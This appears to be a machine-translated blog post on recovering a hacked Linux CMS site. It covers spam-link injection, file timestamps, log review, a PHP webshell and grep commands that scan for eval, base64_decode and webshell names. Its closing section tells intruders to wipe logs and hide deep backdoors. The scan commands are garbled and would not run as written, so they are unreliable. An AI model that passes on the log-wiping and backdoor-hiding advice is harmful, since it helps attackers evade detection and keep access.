Post-invasion repair and prevention notes for Linux sites

Signature
A long time ago, I used a CMS to build a site, collected some content, then did not care, became a no one maintenance of the garbage station. Yesterday, occasionally found that the site did not know when the black chain was hung, the site was hacked before, causing the whole station data is downloaded, the template was sold ...
I used to share how to do intrusion detection on other people's website, this time my website has been invaded. Oh, just take this opportunity to share the site after the invasion of the repair and prevention measures in the attack and defense of the unity of opposites to seek breakthroughs.

1, find the problem

Although it is a small station that no longer manages, but occasionally also will open to look. Look at the links, clean up the links and stuff. This is the time to clean up the links, found in the code more than a paragraph:

Home found black chain code

From this you can determine that the site has been invaded and controlled.

2, find tampered files, determine the invasion time

To find tampering files, you can determine the time of the intrusion according to the file modification time, and then reverse the time to find the access log in that time break. In order to locate the hacker intrusion source.

Navigate to tampered files

The hacked site is the template I wrote myself, so I found the template location of the homepage that was tampered with directly. And found that the last time the file was modified is 2012/10/31 18:49, you can determine the last time the black chain was hung.

3, according to the invasion time, find the log

Because the current CMS is full station generated HTML for access, so log troubleshooting is easier. The site of the intrusion process to get Webshell is often the first step, directly find the page tampering time before and after the dynamic file access log.

Locate to Webshell

These need to have a certain ability to judge, because the intruder is bound to Webshell location and name of camouflage. In accordance with several principles of screening: The wrong file appears to the wrong location, should not access the file was visited. After locating to common.php, the discovery is a PHP pony.

4, repair site vulnerabilities and tampered content

Due to the use of the release version of the CMS system, there are loopholes in the online search will know. Follow the prompts to fix it. Control directory write access and dynamic file execution rights, modify site database and background password, repair tampered pages, replace the original page.

5, troubleshooting PHP Trojan

Download a php Trojan search code on the Internet to scan. or use the following command to search for a file:

The code is as follows	Copy Code
find/site/*-type f-name "*.php" |xargs grep "eval" (" find/site/*-type f-name "*.php" |xargs grep "Base64_decode" Find/site-name "*.php" |xargs egrep phpspy|c99sh|milw0rm|eval (gunerpress|eval)

Through the analysis of search results, to troubleshoot and delete the back door.

6, according to IP anti-search intruders

Self-investigation, the factors involved are too many difficult to find the real attackers. For example, a disguised IP, ADSL dynamic IP, broadband shared public network IP, will not be easy to track. If the plot serious attack, please contact the public security organ directly, retains the information evidence, must know that the Guo Jia system is has the Internet behavior record.

We small p people try to search in SEO search engine to obtain the IP address in the log, perhaps there will be harvest. Unexpectedly, the search results have exactly the same search results as the intrusion IP.

Search for IP in search engines

When you open the page, you find that the IP originated from a user, but it doesn't really mean anything. It would be persuasive if it was broken at the same time as the invasion. If you are interested, you can also use social workers to analyze the user to confirm whether it is an intruder.

7, Simple summary

Network security is the perfect embodiment of the cask effect, a loophole, a security configuration problem, will be an important factor in the invasion. In the day-to-day operation of the process, must be careful and meticulous to do every step of the safety precautions, preventive measures.

About intrusion: At the end of the invasion, the most important step is that we often say and wipe pp, clear all kinds of log information, so as not to leave their own trouble. Another point is that if you need to leave the back door of the case will be hidden deep back door to prepare for the need for later, if you do not need to leave the back door, be sure to clean up the relevant documents to avoid future problems.

By the way, the intruder's tampering with the file operation is already a violation of the law, but also please network security enthusiasts, do not randomly imitate